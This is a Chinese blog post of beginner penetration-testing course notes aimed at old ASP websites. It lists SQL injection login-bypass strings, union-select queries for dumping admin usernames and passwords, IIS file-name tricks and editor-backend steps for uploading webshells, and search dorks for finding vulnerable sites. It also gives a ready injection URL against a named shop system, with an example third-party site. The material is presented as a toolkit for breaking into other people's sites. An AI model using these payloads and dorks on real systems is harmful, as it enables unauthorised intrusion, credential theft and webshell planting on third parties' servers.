流沙团
玄风小组渗透笔记
2017-7-19 流沙团


(入门级别的课程,看看,写了点儿笔记)



XX渗透小组教程


1、啊D,明小子

思路: 找注入点,检测表段,检测字段,检测内容,找后台



2、webshell的介绍

asp大马



3、数据库备份拿webshell

上传大马(图片格式)

备份为asa、asp格式



4、webshell的注意点

大马格式的更改

asp

asa

cdx

cer



5、手工注入

and 1=1

and 1=2



6、菜刀的使用教程



7、万能密码

asp aspx万能密码

1:'or'='or'

2:'.).or.('.a.'='.a 

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or.'a.'='a

8:"or"="a'='a

9:'or''='

10:"or "a"="a







admin'or 1=1#



PHP万能密码

admin'/*

密码*/'





'or 1=1/*



"or "a"="a

"or 1=1--

"or"="

"or"="a'='a

"or1=1--

"or=or"

''or'='or'

') or ('a'='a

'.).or.('.a.'='.a

'or 1=1

'or 1=1--

'or 1=1/*

'or"="a'='a

'or' '1'='1'

'or''='

'or''=''or''='

'or'='1'

'or'='or'

'or.'a.'='a

'or1=1--

1'or'1'='1

a'or' 1=1--

a'or'1=1--

or 'a'='a'

or 1=1--

or1=1--



8、旁注的讲解

思路:找到一台主机下面的其他网站,先渗透一个,再入侵其他站点

上传文件

a.asp;1.jpg  // iis的解析漏洞





9 动感上传漏洞

谷歌搜索inurl:shopxp_news.asp?id=87

http://www.trhm163.com/shopxp_news.asp?id=87



shopxp漏洞利用代码:



爆库:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin



后台admin/login.asp



上传点upfilepic_get.asp?formname=myform&editname=upfilepic&uppath=img_shopxp/upfilepic&filelx=jpg





利用动感购物上传漏洞, 进行拿webshell





10 图片上传拿shell

(一个教育系统的上传漏洞)

谷歌:高校现代教学管理系统

/ftb.imagegallery.aspx

/images/xfbm.asp;xfbm.jpg

xfbm.asp;xfbm.jpg



11 提权拿服务器

php网站,直接上传cmd,执行命令



12 审查元素

直接更改value=asp  再上传



13 爆破账号密码

判断字段长度

order by 10

union select 1,2,3,4,5,6,7,8,9,10 from admin

union select 1,username,password,4,5,6,7,8,9,10 from admin



14 IP代理

花刺代理验证



15 ewebeditor 编辑器 拿webshell

下载数据库

/ewebeditor/db/ewebeditor.mdb



登录后台

/ewebeditor/admin/login.asp

/ewebeditor/admin_login.asp



样式管理

\eWebEditor\Admin_Style.asp



新建样式



图片类型中加入asp

显示路径删除

设置此样式的工具栏

新增工具栏

按钮设置

添加上传图片的按钮

样式预览

上传自己的asp大马



southidceditor编辑器一般以ewebeditor v2.8.0版内核修改

可以利用的链接

/southidceditor/datas/southidceditor.mdb

/southidceditor/admin/admin_login.asp

/southidceditor/popup.asp

/southidceditor/login.asp

/Southidceditor/admin_style.asp?action=copy&id=14

/SouthidcEditor/Admin_Style.asp?action=styleset&id=47

/admin/Southidceditor/ewebeditor.asp?id=57&style=southidc



17 简单上传漏洞的利用

首先到IE里面改一下配置--然后找到活动脚本选择禁用--然后全部确定

关键词:inurl:xxhs.asp?classid=   

上传地址:admin_manage/upfile1.asp

上传后得到的马地址:admin_manage/image/201354125012.asp





18 Fyblogs网站管理系统漏洞

谷歌:inurl:type.asp?id=1 新闻中心

或者 :inurl:download_ok.asp?



万能密码:'or'='or'










一个小孩做的课程,没什么实战价值,  全部为asp的渗透, 回想起以前看这种教程的日子, 2小时看了一下, 打发下时间!!







发表评论:
昵称

邮件地址 (选填)

个人主页 (选填)

内容